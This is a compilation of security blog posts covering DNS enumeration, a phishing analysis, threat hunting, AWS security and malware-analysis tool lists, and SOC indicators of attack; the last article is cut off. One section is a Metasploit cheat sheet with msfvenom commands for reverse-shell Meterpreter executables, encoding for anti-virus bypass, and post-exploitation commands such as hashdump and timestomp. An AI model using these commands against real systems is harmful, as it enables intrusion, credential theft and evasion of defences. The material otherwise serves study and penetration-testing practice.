Information Gathering: DNS Enumeration and Zone Transfer with Nslookup, Host, Dnsrecon, Dnsenum, Fierce , NSE and whois


– Layout for this exercise:

1 – Introduction

– DNS servers are some of the best sources for gathering information about a domain or an organization.

– DNS servers contain DNS and mail information for the domain with authority over what is provided when public requests are made from the Internet.

– Due to the abundant and interesting information contained in the DNS servers DNS Enumeration is one of the most critical steps while gathering information about a target.

– DNS Zone Transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction.

– DNS Zone Transfer is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers.

– A zone transfer uses the Transmission Control Protocol (TCP) for transport, and takes the form of a client–server transaction.

– The client requesting a zone transfer may be a slave server or secondary server, requesting data from a master server, sometimes called a primary server.

– The portion of the database containing the list of all DNS names is the zone file.

– The data contained in a DNS zone may be sensitive from an operational security aspect.

– This is because information such as server hostnames may become public knowledge, which can be used to discover information about an organization and even provide a larger attack surface.

2 – nslookup

– nslookup is a popular tool that queries name and email servers in the Internet given the domain:

– Applying the NS query option for name servers:

– Applying the MX query option for mail servers:

– Applying the ANY query option for both name and mail servers:

3 – host 

– host is a Linux command that performs powerful DNS lookups given a domain name:

– Without any other parameter host provides help:

– Looking for name servers (-t type ns):

– Looking for email servers (-t type mx):

– Looking for web servers :(-t type www):

4 – DNS Zone Transfer with host

– Now, let’s use host for a little more complicated task like a DNS Zone Transfer.

– First, let’s try with the previously enumerated ns1 name server. The zone transfer fails:

– However, the zone transfer with ns2 is successful:

– Finally the zone transfer with ns3 also fails:

– The result of the successful DNS Zone Transfer with ns2 is a full dump of the zone file for the whole domain, providing us a list of IPs and their corresponding DNS names.

– Let’s try entering into a browser some of the IPs obtained from the DNS Zone Transfer:

5 – dnsrecon

– dnsrecon is an automated tool consisting of a Python script that can be user for DNS enumeration.

– Let’s see that information provided by dnsrecon is the same as obtained before.

– First, dnsrecon detects the DNS servers ns1, ns2 and ns3:

– Then, dnsrecon tries a successful DNS zone transfer with ns2:

– Also, dnsrecon tries a DNS zone transfer with ns1 and ns3 with no result:

6 – dnsenum

– dnsenum is a multithreaded Perl script to enumerate DNS information of a domain.

– The output obtained with dnsenum is the same as before:

7 – fierce

– fierce is a Perl base script to perform DNS enumeration. Results obtained with fierce are pretty similar to previous ones:

8 – Nmap Scripting Engine (NSE)

–  Nmap Scripting Engine (NSE) is an addition to Nmap which provides users with scripts to automate several tasks:

– The NSE dns-zone-transfer script provides same output than before:

– A little more limited result, because it finds just a list of common subdomains, is achieved with the NSE dns-brute.nse script:

9 – whois 

– whois is a query and response protocol that is widely used for querying databases that store the registered users of an Internet resource, such as a domain name, an IP address block, or an autonomous system.

– Looking for the domain

Original Post: 

Behind the Scene: Microsoft Phishing Campaign Analysis

The technique used in this phishing campaign draw my attention to have further analysis.

The phishing email spoofing Microsoft support to trick user click on the phishing URL.


Track down on the email header:

Received: from holla (ZeMUxqZXZhgrTP0ikgiWW1o4dTNLMAF5sRFeLlEyBa8wsHdKyqFyHV85oz34oJZQ6M@[]) by

The sender machine is on Microsoft Azure, likely a hacked machine.



That hacked machine have 44 open ports and all of them are hosting with http services.

Non-UTF8 character inserted between Office and 365 to fool spam email detection.


Instead of http redirection, the campaign make use of Javascript technique to bypass URL checking on major email protection vendors


Dynamic DNS hosting for those phishing sites


The Office 365 phishing site looks exactly the same as Microsoft Office 365 login page.


The phishing site is hosting on a hosting provider in Russia.


Microsoft Safe Link Protection is able to detect the phishing site before the Javascript redirection.


Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.


Metasploit :

Search for module:

msf > search [regex]

Specify and exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current modules:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit 

Useful Auxiliary Modules

Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS
msf > run

DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:

msf > use auxiliary/server/socks4
msf > run 

msfvenom :
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]

Example :
Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=
LPORT=4444 > met.exe

Format Options (specified with –f) –help-formats – List available output formats
exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]

Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST= LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table

Misc Commands:
idletime: Display the duration that the GUI of thetarget machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit –j

List all current jobs (usually exploit listeners):

msf > jobs –l

Kill a job:

msf > jobs –k [JobID]

Multiple Sessions:

List all backgrounded sessions:

msf > sessions -l

Interact with a backgrounded session:

msf > session -i [SessionID]

Background the current interactive session:

meterpreter > <Ctrl+Z>
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]


Original post:

Threat Hunting for Non-Hunters

Threat hunting is a proactive task with an assumption that your organization has already been breached and you wanted to beat the average “dwell time” of 256 days; at least for me as a DFIR practitioner. And this is usually done with the help of different tools that we call “arsenals”; SIEM (security information and event management) and EDR (endpoint detection and response) mostly.

However, security is not just for the IT security folks who are paid mainly to do this kind of “Blue Teaming” work (aka Incident Responders) but it is everyone’s responsibility.

Human is the weakest link among the security chain so as an end-user, anyone should have the basic understanding of how tofind malicious activities and files within their workstations.

The malware or malicious software includes but not limited to Keylogger, credential stealerscrypto minerreverse shellransomwarebotnet, and more.

This article aims to empower non-security folks to gain a portion of technical knowledge on hunting threats from their Windowssystems and able to share to their families and friends as well using freely available and downloadable tools from the Internet.

Hunting Persistent Threat with Autorun Programs

There are so huge places in the system that an adversary can plant their malicious programs and run automatically during boottime without an end-user’s awareness.

Tools from Sysinternals Suite by Microsoft Windows; “autorunsc.exe” (command-line) and “Autoruns.exe” (graphical user interface) can help to see all Autorun programs in your machine which can be downloaded on the link below.

Download URL:

Adding the parameter “hyphen h” (-h) to the command autorunsc.exe will give you the MD5 or SHA-256 hashes of the file to check from the Open Source Intelligence (OSInt) websites for Malicious file and URL called VirusTotal(


autorunsc.exe –h

The output can also be redirected to a text file for reference and easy recording.


autorunsc.exe -h > autoruns.txt

“autorunsc.exe –help” will give you more choices to play around with the command-line tool on Windows.

More often, the graphical version of the Autoruns would be preferable to others as a simple right-click on the mouse will give you an option to check the program in VirusTotal on the spot.

Threat Hunting Hidden Processes

Anti-Virus (AV) whether traditional or call themselves as “Next-Gen AV” misses more than 70% of malware according to research and it is because they are still signature-based. And sophisticated malicious programs runs as hidden processes to evade AV detections.

The most common of this kind of malware is “rootkit”, a malicious program that runs on the system’s kernel or memory.

Below are the useful tools that can be utilized against this persistent threat on anyone’s PC.


GMER is an awesome tool in detecting rogue processes that can be downloaded here:

This is a PE (portable executable) tool similar to SysInternal Suites and other tools that are mentioned here.

With the aid of the tool from SysInternal Suite – procexp64.exe (for 64bit Windows system), the tool was found spawning different DLL’s and processes which was also identified as malicious based from the Indicators of Compromised or IOC found from VirusTotal –

Threat Hunting Command & Control

Command & Control or C2 or C&C is a computer server that gives directives to digital devices commonly computers and smartphones that have been infected with rootkit or malware such as Ransomware and other variants. These infected devicesare called “bots” or “botnet” for Robot. Botnets are also used for sending Spam and Distributed Denial of Service (DDOS) attack against the target.

Known C2 servers will be most likely detected by Firewall if it is enabled in a PC or company provided workstation. Except for “zero day” attack when the C2 server is not yet identified by the EDR and Firewall companies.

This may sound a little technical but good to know when needed since the tool of example will be used here is already included in Windows systems.

By opening the command prompt or CMD as administrator, you will be able to run the tool called NETSTAT.

In the command prompt, just type the tool command below with a hyphen “ano” (-ano), parameters to display all networkconnections, with port numbers, and process ID’s. The parameter “f” is useful to see the fully qualified domain name or simply as the website address of the established connections over the internet for quick identification.


netstat –ano

netstat –af

The tool will be prompted with few lines depending on how many tabs open in the browsers when connected to the internet and it will also include the connection in C&C if the host machine is infected with malware or botnet.

This network threat hunting process may take a few minutes as it needs to go through the public IP addresses which are LISTENING and ESTABLISHED for checking from OSInt like VirusTotal, OTX, and other websites that provide IOC’s based from IP’s.

If there is no IOC found from the OSINT, a healthy paranoia will be needed to stop the running processes based from the PID (process id) resulted from the NETSTAT tool by simply running the “TASK MANAGER” through typing the “CTRL+ALT+DELETE” at the same time. Find the PID under the DETAILS tab, mouse right-click on it and “END TASK”.

Threat Hunting Malware

Malicious program threat hunting is different from running an Anti-Virus as it does not need to be quarantined or remove immediately. By running an AV may notify the malware creator that the malicious program planted in the host machine has been found and deleted which the adversary will be warned for detection.

“Triaging” an advanced persistent threat (APT) is crucial in hunting the threat actor and tracing their whereabouts.

A simple IOC scanner called LOKI is effective for that detective role playing like Sherlock Holmes.

This slick tool can be downloaded here:

The tool will give the full directory of both suspicious and malicious file based from its IOC’s that most AV’s does not have yet and may able to delete manually or opt for further malware analysis which is an interesting hobby.

Threat Hunting Rogue Wi-Fi

In my few speaking engagements, I always mention that “Free” is not always good as this is can be a conduit for Social Engineering attacks like Man-In-The-Middle (MITM) or Eaves Dropping technique to steal sensitive information.

It is best to have a healthy paranoia to run tools like my example here to catch rogue access points (AP) in the public.

A handy rogue AP killer and a user-friendly tool called CHELLAM is very useful to stay safe in the wild while the adversary is just one click away to bait their targets and one could be you or your family.


There are so many available tools that can be downloaded in the wild and it is everyone’s discretion on what tool is effective for the individual. As mentioned in my other blogs, a mindset of a hunter is the most important and that cannot be taken from classroom training nor in Ph.D. degree. Again, security is everybody’s responsibility and either you are part of the solution or just another brick in the wall.

Original Post:

The AWS Security Open Source Toolkit


I love AWS. I love Open Source. I love Security. So I’ve been bringing together a compilation of the best tools available to monitor, audit, train up on and find exposures in your AWS accounts.

You can find the GitHub repo here;

Please add to that if you wish!


Generate a report of all S3 buckets for an account:

Find open S3 buckets:

Generate Network Diagrams:

Cred Scanner:


Disable Access Keys after X days;

Secrets Management;

Least Privilege:

Resource Counter:

IAM Access Advisor:




Policy changes & Insecure config:

Policy & Encryption;



AWS Attack Library;

Thanks to all the awesome open-sourcers who make these possible!

Original Post:

Most Important Security Tools and Resources For Security Researcher, Malware Analyst, Reverse Engineer

Important Tools and Resources

Security Professionals always need to learn many tools , techniques and concepts to analyze sophisticated Threats and current cyber attacks.

Here we are going to see some of the most important tools , books, Resources which is mainly using for Malware Analysis and Reverse Engineering.

Hex Editors

A hex editor (or binary file editor or byteeditor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.


disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline – A scalable distributed file analysis framework.
  • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • Detect-It-Easy – A program for determining types of files.
  • ExifTool – Read, write and edit file metadata.
  • File Scanning Framework – Modular, recursive file scanning solution.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • – Python script for easy searching of the database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives

Dynamic Binary Instrumentation

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding


Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker – A generic hidden code extractor for Windows malware.
  • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.


IN this List we could  see the tools for Disassemblers, debuggers, and other static and dynamic analysis tools.

  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect – Identifies and extracts information from bots and other malware.
  • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary ninja – A reversing engineering platform that is an alternative to IDA.
  • Binwalk – Firmware analysis tool.
  • Bokken – GUI for Pyew and Radare. (mirror)
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using  clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based   on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper – The macOS and Linux Disassembler.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma – Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer – Advanced task manager for Windows.
  • Process Hacker – Tool that monitors system resources.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • PSTools – Windows command-line tools that help manage and investigate live systems.
  • Pyew – Python tool for malware analysis.
  • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD – QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 – Reverse engineering framework, with debugger support.
  • RegShot – Registry compare utility that compares snapshots.
  • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
  • strace – Dynamic analysis for Linux executables.
  • Triton – A dynamic binary analysis (DBA) framework.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
  • X64dbg – An open-source x64/x32 debugger for windows.

Binary Format and  Binary Analysis

The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.


A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

Online Scanners and Sandboxes

Following Tools are using for Web-based multi-AV scanners, and malware sandboxes for automated analysis.

  • – Online sandbox.
  • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar – online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • detux – A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
  • DRAKVUF – Dynamic malware analysis system.
  • – Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox – Deep malware analysis with Joe Sandbox.
  • Jotti – Free online multi-AV scanner.
  • Limon – Sandbox for Analyzing Linux Malware.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • malsub – A Python RESTful API framework for online malware and URL analysis services.
  • Malware config – Extract, decode and display online the configuration settings from common malwares.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • – Scan a file, hash or IP address for malware (free).
  • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • ProcDot – A graphical malware analysis tool kit.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • Sand droid – Automatic and complete Android application analysis system.
  • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
  • VirusTotal – Free online analysis of malware samples and URLs
  • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • evolve – Web interface for the Volatility Memory Forensics Framework.
  • FindAES – Find AES encryption keys in memory.
  • – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • VolUtility – Web Interface for Volatility Memory Analysis framework.
  • WDBGARK – WinDBG Anti-RootKit Extension.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – Open Source Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse – Store, tag, and search malware.
  • Polichombr – A malware analysis platform designed to help analysts to reverse malwares collaboratively.
  • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper – A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scrapped from malicious sites.
  • MalwareDB – Malware samples repository.
  • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities
  • theZoo – Live malware samples for analysts.
  • Tracker h3x – Agregator for malware corpus tracker and malicious download sites.
  • ViruSign – Malware database that detected by many anti malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • VX Vault – Active collection of malware samples.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Domain Analysis

Inspect domains and IP addresses.

  • – Community based IP blacklist service.
  • boomerang – A tool designed for consistent and safe capture of off network web resources.
  • Cymon – Threat intelligence tracker, with IP/domain/hash search.
  • – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
  • mailchecker – Cross-language temporary email detection library.
  • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery – Free URL Scanner.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • ZScalar Zulu – Zulu URL Risk Analyzer.


Most Important books Reverse Engineering Books

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • JS Deobfuscator – Deobfuscate simple Javascript that use eval or document.write to conceal its code.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • Fileintel – Pull intelligence per file hash.
  • Hostintel – Pull intelligence per host.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe – A Python OpenIOC editor.
  • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources


This list is Created with helping of following Awesome Peoples.

Original Post:

Indicator Of Attack(IoA’s) And Activities – SOC/SIEM – A Detailed Explanation


What is an Indicator of Attack (IOA)

IoAs is some events that could reveal an active attack before indicators of compromise become visible. Use of IoAs provides a way to shift from reactive cleanup/recovery to a proactive mode, where attackers are disrupted and blocked before they achieve their goal such as data thief, ransomware, exploit, etc.

IOAs focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack. Just like AV signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, next-generation security solutions are moving to an IOA-based approach

10 Indicators of attack (IoAs)

The following most common attack activities could have been used, individually or in combination, to diagnose active attacks:

1) Internal hosts with bad destinations

Internal hosts communicating with known bad destinations or to a foreign country where you don’t conduct business.


An example of HP ArcSight Dashboard that shows client’s hosts communicating with Feeds(IP, Domain, Url) from “” website.


Example of Global Threat Intelligence from McAfee

2) Internal hosts with non-standard ports

Internal hosts communicating to external hosts using non-standard ports or protocol/port mismatches, such as sending command shells (SSH) rather than HTTP, HTTPS traffic over port 80,443, the default web port.


Example of Internal Host using 21(FTP), 445(SMB), 137(NETBIOS-NS), 135(RPC) to the Internet

3) Public Servers/DMZ to Internal hosts

Publically servers or demilitarized zone (DMZ) hosts communicating to internal hosts. This allows leapfrogging from the outside to the inside and back, permitting data exfiltration and remote access to assets such as RDP(Remote Desktop Protocol), Radmin, SSH.


An example of a Report that monitor Top 10 Traffic from “DMZ” zone to “Internal/Client” Zone.

From this report, Security Analyst should investigate to Highlighted Servers that communicating to Internal hosts via RDP(TCP/3389), SSH(TCP/22)

4) Off-hour Malware Detection

Alerts that occur outside standard business operating hours (at night or on weekends) could signal a compromised host.


Example of IPS alerts on non-working time (Holiday)

5) Network scans by internal hosts

Network scans by internal hosts communicating with multiple hosts in a short time frame, which could reveal an attacker moving laterally within the network. This incident detects from Perimeter network defenses such as firewall and IPS. You must choose Zone/Interface from “Internal” to “Internal” only. For Future, you should focus Reference: “Internal” to “DMZ” too. It may be “Insider Threat” or “Compromise hosts” that they need more information from your networks (Reconnaissance)


Example of Network Scans Report that filters from “Internal” to “Internal” zone

6) Multiple alarm events from a single host

Multiple alarm events from a single host or duplicate events across multiple machines in the same subnet over a 24-hour period, such as repeated authentication failures. THIS IS COMMON USE CASE.


Example Dashboard that monitoring “User Login Failures” from Single Hosts

Note: some login failed events form e-mail applications on mobile phones can generate events more 500 events/minute. I found this case when the password of a user account is expired but they have not change the new password on their devices.

7) System is reinfected with malware

After the Infected host is cleaned, a system is reinfected with malware within 5-10 minutes, repeated reinfections signal the presence of a rootkit or persistent compromise. This incident may detect from Endpoint Security Protection or Anti-Virus events.


This is Example Malware Dashboard.

Detection: You must create at least 3 rules on SIEM follow as

